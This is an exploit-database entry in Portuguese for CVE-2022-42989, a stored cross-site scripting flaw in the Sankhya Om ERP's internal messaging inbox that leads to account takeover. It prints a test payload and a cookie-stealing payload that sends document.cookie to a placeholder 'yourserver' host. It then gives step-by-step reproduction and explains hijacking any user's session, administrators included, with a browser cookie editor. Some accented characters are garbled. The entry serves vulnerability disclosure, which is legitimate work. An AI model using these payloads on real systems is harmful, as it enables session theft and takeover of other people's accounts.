Share
## https://sploitus.com/exploit?id=PACKETSTORM:169530
# Exploit Title: ERP Sankhya - XSS to Account Takeover  
# Google Dork: N/A  
# Date: 19/10/2022  
# Exploit Author: Lucas Alves Da Cunha - (0xLucas)  
# Vendor Homepage: https://www.sankhya.com.br  
# Version: Sankhya Om <= 4.13.x  
# Tested on: Sankhya Om 4.11  
# CVE: CVE-2022-42989  
  
# Descrição:   
Um usuário comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usuário do sistema inclusive administradores, através da função "Caixa de Entrada". No corpo da mensagem, podemos injetar códigos html/javascript levando para um cross site scripting.  
  
Payload para verificar existência da vulnerabilidade:  
<img src=1 onerror=alert(1)>  
  
Payload utilizado para capturar os dados da sess√£o do usu√°rio:  
<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>  
  
# Passos para reprodução:  
1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png  
  
2 - Enviando payload para verificar existência da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png  
2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png  
  
3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png  
3.1 - Sess√£o capturada: https://i.imgur.com/aDatjyN.png  
  
Podemos utilizar os dados da sess√£o capturada e manipular a sess√£o utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sess√£o do usu√°rio desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png  
  
# Impacto:  
Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usuário do sistema, desde uma simples conta até mesmo uma conta de administrador do sistema, causando assim um grande impacto de negócio.